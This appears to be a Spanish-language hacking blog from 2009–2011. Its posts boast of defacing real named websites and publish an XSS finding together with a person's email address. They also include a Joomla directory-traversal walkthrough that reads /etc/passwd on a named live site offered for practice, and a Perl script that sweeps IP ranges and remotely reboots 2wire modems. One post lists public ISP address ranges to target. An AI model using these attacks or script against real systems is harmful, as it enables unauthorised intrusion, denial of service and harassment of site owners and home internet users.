Cr4fT1g4C

Nuevo Concepto Informático

2011-03-17T13:42:00.000-07:00

Hola que tal solo aqui dejando este nuevo sitio en el cual puedes encontrar cursos, asesorias, y un programa de radio online llama plug&play muy bueno, se los dejo.

http://nci.vzpla.net/

h4ck3d comic-ar

2009-12-29T16:29:00.000-08:00

Hola de nuevo esta ves solo enseñandoles un bonito deface del sitio web comic-ar,dar clic, como muchas veces este admin no respondio a msj chala chala por esa razon aqui les dejo el deface.

Y recuerden es mejor prevenir que lamentar asi que estudienle o vayan con un asesor de seguridad informatica.

Fijense bien en la url y espero y con esta advertencia el admin solucione el problema en caso de que no, posteare un tutorial de como defacearlo.

A petición de algunos escépticos volvi a defacearla y tambien por que lo unico que hizo el admin fue colocar de nuevo el index por que no entenderan por las buenas, aqui les dejo la imagen, ha y por ultimo no esperen que la pagina este defaceada durante mucho tiempo por ello la razon de las imagenes.

sex web cam XSS

2009-12-16T22:46:00.000-08:00

Esta es una pequeña anecdota que me sucedio en estos días, resulta que estaba chateando como de constumbre y de repente una "chava" me contacta y empiza a platicar conmigo todo en ingles no hablaba español y en eso que me dice que si queria verla desnuda y como todo hombre respetuoso le dije que no, pero seguia insistiendo y dije bueno ya que insistes, me mando un link que redireccinaba a www.ifriendsv2.net la cual era para sexo por webcam pero el chiste era que tenias que introducir tus datos de tu tarjeta de credito nada tonta!, entonces como ya sabia de que se trataba la movida por que al primo de un amigo ya le habia pasado lo mismo xD.
Entonces le dije que no tenia tarjeta pero insistia demasiado entonces que le digo si sigues molestando te voy a hackear tu sitio web y me robare todo tu dinero y eliminare todos los usuarios obvio no soy hacker que quede claro y no me creyó y seguia insistiendo y como no queria eliminarla por que me estaba divirtiendo jaja que le encuentro un XSS a su sitio web y que le mando el link y al ver su sitio de la siguiente forma no volvi a saber nada de ella, su correo es angelica_proud27@yahoo.com si alguien la conoce me la saluda XD.

Si alguien gusta ver el XSS

www.ifriendsv2.net

Joomla Directory Transversal

2009-12-16T14:00:00.000-08:00

joomla directory transversal

Esta vulnerabilidad esta confirmada en la version 1.5.8 pero otras vesiones tambien podrian ser vulnerables, esto sucede por la entrada de la cabecera http "X_CMS_LIBRARY_PATH" manipulando "plugins/editors/xstandard/attachmentlibrary.php" y no verifica adecuadamente antes de ser utilizado. Esto puede ser explotado para mostrar contenido de un directorio arbitrario a través de ataques transversales de directorio o bien dicho de otra forma podemos ver archivos y directorios del servidor en donde esta alojado este sitio web.
Lo primero que se tiene que hacer es escanear un sitio web realizado en joomla, esto lo podemos hacer con el joomscan la cual la pueden descargar de esta direccion:
http://sourceforge.net/projects/joomscan/, una ves descargada nos dirigimos a esta carpeta con una consola ya sea en windows o en linux asta llegar en la carpeta donde se encuentra el joomscan.pl (se necesita tener instalado perl).

Para utilizar esta herramienta como muchas otras puden obtener la ayuda colocando joomscan.pl -h

Para realizar el escaneo se hace de la siguiente forma "joomscan.pl -pv -u victima.com" y empezara a escanear el website.
Para saber si es vulnerable a esta tecnica debe de aparecer el siguiente mensaje:

En donde nos esta diciendo que si es vulnerable, nos dice la ruta de la pagina php vulnerable y nos dice asta la forma de explotar esta vulnerabilidad.
Bueno para explotar esta vulnerabilidad se requiere de otra herramienta llamada modify headers es un complemento de firefox lo pueden descargar facilmente esta herramienta sirve para agregar, modificar o filtrar cabeceras http, entonces nos dirigimos en el navegador a la ruta que dice en "check:" y en realidad nos aparecera el contenido de un xml:

Despues abrimos modify headers y lo que se va hacer
es agregar una cabecera llamada "X_CMS_LIBRARY_PATH" con el valor "../" y nos va ir mostrando los directorios y archivos almacenados en el servidor:
http://www.imagechicken.com/uploads/1260602653052523600.jpg
si quieren seguir subiendo pueden ir agregando en el valor "../../" y de esta forma se puede ir navegando en el server, tambien se podria ver el archivo "../../../etc/passwd" el numero de "../" depende de la estructura del server y si se encuentra passwd XD.

Como puden ver esta tecnica es algo laboriosa y se necesita tener conocimientos de como utilizar exploits o herramientas por medio de la consola y conocimientos de cabeceras http, pero pues no deja de ser otra opcion de kakear xD servidores web.
En este caso se realizo con el sitio web www.urbeconomica.com y pueden practicar con ese.
Asta la proxima.
Cualquier duda, sugerencia, reclamo o comentario favor escribirlo.

by Cr4fT1g4C

WEB SITE COLEGIO PATERSON H4CK3D

2009-12-03T16:44:00.001-08:00

Esta ves les muestro una sitio web hackeado dicho sitio web es de méxico, realmente estoy en contra de el deface o modificar los sitios web pero hay ocaciones en los que los administradores de red son tan estupidos que aunque les avices no hacen nada, ya que eso me toco a mi.
La semana pasada le hice sql injection al sitio web de chimalhuacan en cuanto vi que era vulnerable me puse en contacto con el web master le mande como 5 msj diciendole que estaba mal su sitio y trate de explicarle pero no me entendio todavia asta le hice un manual de como correjirlo y nada y la verdad lo note un poco esceptico en cuanto a esto asta la fecha sigue vulnerable su sitio.
Entonces por más que haya personas buenas que quieran ayudar con personas como este tipo es inutil.
Asi que si son web master alguno de ustedes no les vendria mal documentarse un poco sobre la seguridad.
Saludos.

nuevo

2009-11-26T16:53:00.001-08:00

NCI (Nuevo Concepto Informatico)

2009-11-25T23:06:00.000-08:00

Empresa NCI dedicada a asesoria de TI y Seguridad Informatica para pequeñas y medianas empresas.
Por favor lee lo siguiente, para poder verlo mejor da clic en la imagen.

Seguridad y Redes - Analisis forense: la CSI de la informática

2009-11-17T15:19:00.000-08:00

Ponencia Seguridad y Redes - Analisis forense: la CSI de la informática la cual considero la mejor de Campus-Party.

Proyecto Natal

2009-11-08T00:20:00.000-08:00

'Proyecto Natal' es el nombre en clave de una nueva y revolucionaria forma de jugar en tu Xbox 360..
Pero mejor checalo por ti mismo:

fuente:http://www.xbox.com/es-ES/news-features/news/Project-Natal-in-detail-050609.htm

Exploit DoS 2wire https 5001

2009-11-07T15:10:00.000-08:00

Bueno amigos aqui les dejo este nuevo exploit el cual reinicia todos los 2wire vulnerables dentro de un rango de IPs...

Les dejo el codigo fuente esta elaborada en perl y un video demostrativo.

Espero les guste:

use LWP::UserAgent;
use Net::Ping;

print "****************************************************\n";
print "**** 2wire Remote DoS HTTPS and 50001 ****\n";
print "**** Cr4fT1g4C ****\n";
print "**** http://cr4ft1g4c-s3cur1ty.blogspot.com/ ****\n";
print "**** ejemplo rango ip: 189.189.189 ****\n";
print "****************************************************\n";
print "inserta_rango_ip:";

$var = ;
chop ($var);
$var1 = 1;
$p = Net::Ping->new();
while ($var1<=254){
$var2 = ($var.".".$var1);
if ($p->ping($var2, 2)){
print "El 2wire $var2 responde\n";
$url = "https://$var2:50001/xslt?page=%0d%0a";
$ua = LWP::UserAgent->new;
close ($url);
$ua->get( $url);
close ($url);
print "El 2wire $var2 REINICIADO\n" unless $p->ping($var2);
print "El 2wire $var2 no vulnerable\n" if $p->ping($var2);
$p->close();
}
else{print "El 2wire $var2 no responde \n"}
$var1++;
}
print "ESCANEO REALIZADO";

2wire DoS IPs para probar

2009-10-23T14:21:00.000-07:00

Bueno siguiendo con la vulnerabilidad DoS del 2wire les dejo esta vez
unas cuantas direcciones ip con las cuales pueden probar
minimo unas 100 de 255 son vulnerables como minimo.

189.170.123.x
189.171.123.x
189.174.123.x
189.177.123.x
189.178.123.x

Hay muchisimas mas tan solo en el nombre de host debe de tener
dsl-xxx-xxx-xxx-xxx-dyn.prod-infinitum.com.mx

2wire DoS por HTTPS

2009-10-21T22:20:00.000-07:00

2wire DoS por HTTPS.

Hola soy Cr4fT1g4C y es mi primer post esper les guste.

La antigua y conocida vulnerabilidad de los modems 2wire deinfinitum descubiertos por HKM (http://www.hakim.ws/), en la cual por medio de modificar la URL podriamos hacer que el modem se reinicie.
Dicha vulnerabilidad se suponia que solo se podia realizar si pertenecias a la red interna (LAN) y que el modem 2wire fuera tu gateway.

Un ejemplo:

http://192.168.1.254/xslt?page=%0d%0a

Donde 192.168.1.254 era la direccion de tu modem 2wire.

Bueno pero con este gran descubrimiento de HKM que me ha servido de apoyo, he descubierto que por medio del protocolo https y el puerto 50001 los modems 2wire de infinitum lo utilizan para poder accesar al modem de forma remota, teniendo el user y el pass

Pero por medio de esta conexion https y el puerto 50001 se puede realizarla la misma vulnerabilidad de denegacion de servicio esto nos da una gran ventaja ya que sin necesidad de pertenecer a la LAN como HKM decia podemos realizar este ataque solo agregando a la url los siguientes parametros: protocolo, ip, puerto y xslt?page=%0d&0a, lo cualquedaria de la siguiente forma:

https://ip_victima:50001/xslt?page=%0d%0a

Colocando esta URL, claro la ip debe ser la publica y el modem 2wire debe tener los siguientes Firmware:

5.29.51

3.17.5

3.7.1

Los cuales son vulnerables.Asi que cualquier usuario que tenga esta version de firmware,que tenga habilitado https y el puerto 50001 este abierto sera vulnerable sin necesidad de que el atacante tenga el user y el password y sin necesidad que este dentro de su LAN.

AVISO U T N

2009-09-07T21:26:00.000-07:00

AVISO a todos aquellos que esten en la carrera de Telematica o Informatica en la famosisima UTN esto les puede servir.

Un grupo de exalumnos estan empezando un equipo llamado CNI (nuevo concepto informatico) el cual tienen como fin ayudar a los alumnos dando todo tipo de asesorias o ayudando en trabajos o proyectos escolares.
De igual forma si consideras que tienes un buen nivel en algunos de los siguientes temas si lo deseas puedes unirte a nosotros.

CCNA
LINUX
WINDOWS
ELECTRONICA
PAGINAS WEB
SOPORTE TECNICO

Para mayores informes favor de contactarnos:
cni_inf@hotmail.com